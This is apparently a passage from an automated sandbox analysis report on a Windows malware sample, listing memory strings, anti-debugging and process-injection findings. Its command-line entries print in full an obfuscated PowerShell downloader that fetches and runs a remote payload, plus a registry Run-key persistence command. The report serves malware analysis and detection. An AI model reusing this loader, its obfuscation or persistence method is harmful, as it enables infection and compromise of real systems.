                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Gr$Hyper-V Time Synchronization Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Remote Desktop Virtualizati...
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Gr$Hyper-V Volume Shadow Copy Requestorw
                Source: svchost.exe, 00000007.00000002.2851581613.000001CBC265A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2851032335.000001CBBD02B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #Hyper-V Remote Desktop Virtualizati
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Shutdown Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Service Interface
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Gr-Hyper-V Remote Desktop Virtualization Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Heartbeat Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V PowerShell Direct Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Data Exchange Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Stopped vmicvss
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Gr!Hyper-V PowerShell Direct Service{
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Volume Shadow Copy Requestor
                Source: powershell.exe, 00000002.00000002.1052748558.0000014D68D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSo%SystemRoot%\system32\mswsock.dll = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM ..tAe xFT .REMnBcUO dTI n GS]L:C:Ha S,C i2 ?:
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D010DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D01ADB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Time Synchronization Service
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D56EF0 LdrInitializeThunk,4_2_04D56EF0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_6392.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6948, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4660000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM .Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "get-service;$bjrgningsfartjet='func';get-history;$bjrgningsfartjet+='t';get-history;$bjrgningsfartjet+='ion:';(ni -p $bjrgningsfartjet -n slede -value { param($monastically);$asherah229=1;do {$specifikationsmetodikker+=$monastically[$asherah229];$asherah229+=2} until(!$monastically[$asherah229])$specifikationsmetodikker});convertto-html;(ni -p $bjrgningsfartjet -n studiefagets -value {param($variabelerklringers);.($kvalt) ($variabelerklringers)});convertto-html;$sternocleidomastoid=slede 'gnbe th.nw';$sternocleidomastoid+=slede 'pe bpc lqige.n t';$bogklubbgers=slede ' mnoszki lblma /';$bottomers8=slede 'vt,l s 1 2';$fendillation=' [ nse tu.ss eertvsi c,e p o.i n.t mtain a.gbebr.] : :gs eac u r,i t y p r optto cdocls= $ bpo tntwo,m e.rss 8';$bogklubbgers+=slede ' 5c..0. s( w i n d,o wbsr nit .1 0u..0.; uw ionc6f4v;s nxo6,4 ;k rpvf: 1t3p4.. 0a)d g emc k.om/,2r0a1,0 0,1 0e1 lfoi.rde f otx / 1,3p4u. 0';$postventral=slede 'suas e r -sacg.e,net';$spunshul=slede 'ihstgt pa:l/d/du dpinrdea. wee,b pkg,.,i tr/ h,alr.mpognmi k a ejr nne.. mai x';$putidness=slede 'r>';$kvalt=slede ' iue.x';$fluesnapperes='opnaaende';$undarkened='\rdkindedes90.par';studiefagets (slede ' $dg.lso.b,a.ld:hd a tua b eshua ntdolueds =k$ eanavn:ma psp dda tea + $rupn d airdkse n esd');studiefagets (slede 's$sg,l oabga lb:,b o d e l s 1k0 3n=a$ sup u.nms.h u l,..s pbl iot (s$ pcugtuivdpnke s s,)');studiefagets (slede $fendillation);$spunshul=$bodels103[0];$perosmic=(slede ' $pg.loo boa lb:md i.f,teeur.insa= nbeuwd-.o brj,e cktf stylsntve mh.o$,s tfe,r,nsoscflne itd o m a s tio i d');studiefagets ($perosmic);studiefagets (slede ' $ dbi fptse riips .mh e atd e rfs,[b$ prodsat v.esnpt rsa ls] =a$ b o,gtkal u.bfb gfedrhs');$storefronts=slede ' $sdji.fpt e r i s,..dsobwansltoba d fti,lse ( $ks p.uenksth u l , $sd ednui e riefn,ss)';$denierens=$databehandles;studiefagets (slede ' $mg.ljo bbaslm:ighrdaefhi k.s yssdt e m e t =o( tfe s t -apfa t ha a$,d e nfideprcesnms )');while (!$grafiksystemet) {studiefagets (slede 'b$igpl o bra ls:su nsf a islga bsldy = $ sktci nhkre,t') ;studiefagets $storefronts;studiefagets (slede 'a[,t h r e asdsipnngs. t h r e a,d ] : :osaltesespv( 4t0 0p0 )');studiefagets (slede ' $ gvlioebeanl :,gdrfacfsimk sdyws,t e,m eutb=,( t e s to-wpta t ht o$ d e.nbi,ehr efnss )') ;studiefagets (slede 'p$ gflao baa lp:wphe r i.p.nfe u maobn isas=u$egol.o b a ls:np ohsrt ndapt.a lrl y + + %s$ bho dpe lds.1b0d3 .jcuodurnst') ;$spunshul=$bodels103[$peripneumonia]}$transcenderende=329225;$ultrastructurally=28193;studiefagets (slede ' $ g.lao bia.l : fue.mhedt a gme,rss hdu s e sr p=c bg eitt-gcoo nktbe n.ts b$ddde,n isehrsepnks');studiefagets (slede '.$sg.lso bvaml :fsstsesgwe p amnud epr n e ss = ,[isbyusit e m . c,o n.v eir t.]d: :vfaraovmmbkags ef6p4 s trrdi.ntg ( $bftedmsedt,arg e r skh u saeas,)');studiefagets (slede 's$kg lho b a ls:ahda vae a bclsen o=f m[ s.y setaeam .
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$bjrgningsfartjet='func';get-history;$bjrgningsfartjet+='t';get-history;$bjrgningsfartjet+='ion:';(ni -p $bjrgningsfartjet -n slede -value { param($monastically);$asherah229=1;do {$specifikationsmetodikker+=$monastically[$asherah229];$asherah229+=2} until(!$monastically[$asherah229])$specifikationsmetodikker});convertto-html;(ni -p $bjrgningsfartjet -n studiefagets -value {param($variabelerklringers);.($kvalt) ($variabelerklringers)});convertto-html;$sternocleidomastoid=slede 'gnbe th.nw';$sternocleidomastoid+=slede 'pe bpc lqige.n t';$bogklubbgers=slede ' mnoszki lblma /';$bottomers8=slede 'vt,l s 1 2';$fendillation=' [ nse tu.ss eertvsi c,e p o.i n.t mtain a.gbebr.] : :gs eac u r,i t y p r optto cdocls= $ bpo tntwo,m e.rss 8';$bogklubbgers+=slede ' 5c..0. s( w i n d,o wbsr nit .1 0u..0.; uw ionc6f4v;s nxo6,4 ;k rpvf: 1t3p4.. 0a)d g emc k.om/,2r0a1,0 0,1 0e1 lfoi.rde f otx / 1,3p4u. 0';$postventral=slede 'suas e r -sacg.e,net';$spunshul=slede 'ihstgt pa:l/d/du dpinrdea. wee,b pkg,.,i tr/ h,alr.mpognmi k a ejr nne.. mai x';$putidness=slede 'r>';$kvalt=slede ' iue.x';$fluesnapperes='opnaaende';$undarkened='\rdkindedes90.par';studiefagets (slede ' $dg.lso.b,a.ld:hd a tua b eshua ntdolueds =k$ eanavn:ma psp dda tea + $rupn d airdkse n esd');studiefagets (slede 's$sg,l oabga lb:,b o d e l s 1k0 3n=a$ sup u.nms.h u l,..s pbl iot (s$ pcugtuivdpnke s s,)');studiefagets (slede $fendillation);$spunshul=$bodels103[0];$perosmic=(slede ' $pg.loo boa lb:md i.f,teeur.insa= nbeuwd-.o brj,e cktf stylsntve mh.o$,s tfe,r,nsoscflne itd o m a s tio i d');studiefagets ($perosmic);studiefagets (slede ' $ dbi fptse riips .mh e atd e rfs,[b$ prodsat v.esnpt rsa ls] =a$ b o,gtkal u.bfb gfedrhs');$storefronts=slede ' $sdji.fpt e r i s,..dsobwansltoba d fti,lse ( $ks p.uenksth u l , $sd ednui e riefn,ss)';$denierens=$databehandles;studiefagets (slede ' $mg.ljo bbaslm:ighrdaefhi k.s yssdt e m e t =o( tfe s t -apfa t ha a$,d e nfideprcesnms )');while (!$grafiksystemet) {studiefagets (slede 'b$igpl o bra ls:su nsf a islga bsldy = $ sktci nhkre,t') ;studiefagets $storefronts;studiefagets (slede 'a[,t h r e asdsipnngs. t h r e a,d ] : :osaltesespv( 4t0 0p0 )');studiefagets (slede ' $ gvlioebeanl :,gdrfacfsimk sdyws,t e,m eutb=,( t e s to-wpta t ht o$ d e.nbi,ehr efnss )') ;studiefagets (slede 'p$ gflao baa lp:wphe r i.p.nfe u maobn isas=u$egol.o b a ls:np ohsrt ndapt.a lrl y + + %s$ bho dpe lds.1b0d3 .jcuodurnst') ;$spunshul=$bodels103[$peripneumonia]}$transcenderende=329225;$ultrastructurally=28193;studiefagets (slede ' $ g.lao bia.l : fue.mhedt a gme,rss hdu s e sr p=c bg eitt-gcoo nktbe n.ts b$ddde,n isehrsepnks');studiefagets (slede '.$sg.lso bvaml :fsstsesgwe p amnud epr n e ss = ,[isbyusit e m . c,o n.v eir t.]d: :vfaraovmmbkags ef6p4 s trrdi.ntg ( $bftedmsedt,arg e r skh u saeas,)');studiefagets (slede 's$kg lho b a ls:ahda vae a bcl
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "sorbed" /t reg_expand_sz /d "%dalsnkningens% -windowstyle 1 $knobets=(gi 'hkcu:\software\nskeligeres117\').getvalue('nskebarn');%dalsnkningens% ($knobets)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "get-service;$bjrgningsfartjet='func';get-history;$bjrgningsfartjet+='t';get-history;$bjrgningsfartjet+='ion:';(ni -p $bjrgningsfartjet -n slede -value { param($monastically);$asherah229=1;do {$specifikationsmetodikker+=$monastically[$asherah229];$asherah229+=2} until(!$monastically[$asherah229])$specifikationsmetodikker});convertto-html;(ni -p $bjrgningsfartjet -n studiefagets -value {param($variabelerklringers);.($kvalt) ($variabelerklringers)});convertto-html;$sternocleidomastoid=slede 'gnbe th.nw';$sternocleidomastoid+=slede 'pe bpc lqige.n t';$bogklubbgers=slede ' mnoszki lblma /';$bottomers8=slede 'vt,l s 1 2';$fendillation=' [ nse tu.ss eertvsi c,e p o.i n.t mtain a.gbebr.] : :gs eac u r,i t y p r optto cdocls= $ bpo tntwo,m e.rss 8';$bogklubbgers+=slede ' 5c..0. s( w i n d,o wbsr nit .1 0u..0.; uw ionc6f4v;s nxo6,4 ;k rpvf: 1t3p4.. 0a)d g emc k.om/,2r0a1,0 0,1 0e1 lfoi.rde f otx / 1,3p4u. 0';$postventral=slede 'suas e r -sacg.e,net';$spunshul=slede 'ihstgt pa:l/d/du dpinrdea. wee,b pkg,.,i tr/ h,alr.mpognmi k a ejr nne.. mai x';$putidness=slede 'r>';$kvalt=slede ' iue.x';$fluesnapperes='opnaaende';$undarkened='\rdkindedes90.par';studiefagets (slede ' $dg.lso.b,a.ld:hd a tua b eshua ntdolueds =k$ eanavn:ma psp dda tea + $rupn d airdkse n esd');studiefagets (slede 's$sg,l oabga lb:,b o d e l s 1k0 3n=a$ sup u.nms.h u l,..s pbl iot (s$ pcugtuivdpnke s s,)');studiefagets (slede $fendillation);$spunshul=$bodels103[0];$perosmic=(slede ' $pg.loo boa lb:md i.f,teeur.insa= nbeuwd-.o brj,e cktf stylsntve mh.o$,s tfe,r,nsoscflne itd o m a s tio i d');studiefagets ($perosmic);studiefagets (slede ' $ dbi fptse riips .mh e atd e rfs,[b$ prodsat v.esnpt rsa ls] =a$ b o,gtkal u.bfb gfedrhs');$storefronts=slede ' $sdji.fpt e r i s,..dsobwansltoba d fti,lse ( $ks p.uenksth u l , $sd ednui e riefn,ss)';$denierens=$databehandles;studiefagets (slede ' $mg.ljo bbaslm:ighrdaefhi k.s yssdt e m e t =o( tfe s t -apfa t ha a$,d e nfideprcesnms )');while (!$grafiksystemet) {studiefagets (slede 'b$igpl o bra ls:su nsf a islga bsldy = $ sktci nhkre,t') ;studiefagets $storefronts;studiefagets (slede 'a[,t h r e asdsipnngs. t h r e a,d ] : :osaltesespv( 4t0 0p0 )');studiefagets (slede ' $ gvlioebeanl :,gdrfacfsimk sdyws,t e,m eutb=,( t e s to-wpta t ht o$ d e.nbi,ehr efnss )') ;studiefagets (slede 'p$ gflao baa lp:wphe r i.p.nfe u maobn isas=u$egol.o b a ls:np ohsrt ndapt.a lrl y + + %s$ bho dpe lds.1b0d3 .jcuodurnst') ;$spunshul=$bodels103[$peripneumonia]}$transcenderende=329225;$ultrastructurally=28193;studiefagets (slede ' $ g.lao bia.l : fue.mhedt a gme,rss hdu s e sr p=c bg eitt-gcoo nktbe n.ts b$ddde,n isehrsepnks');studiefagets (slede '.$sg.lso bvaml :fsstsesgwe p amnud epr n e ss = ,[isbyusit e m . c,o n.v eir t.]d: :vfaraovmmbkags ef6p4 s trrdi.ntg ( $bftedmsedt,arg e r skh u saeas,)');studiefagets (slede 's$kg lho b a ls:ahda vae a bclsen o=f m[ s.y setaeam .Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "sorbed" /t reg_expand_sz /d "%dalsnkningens% -windowstyle 1 $knobets=(gi 'hkcu:\software\nskeligeres117\').getvalue('nskebarn');%dalsnkningens% ($knobets)"Jump to behavior
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[bM
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.drBinary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
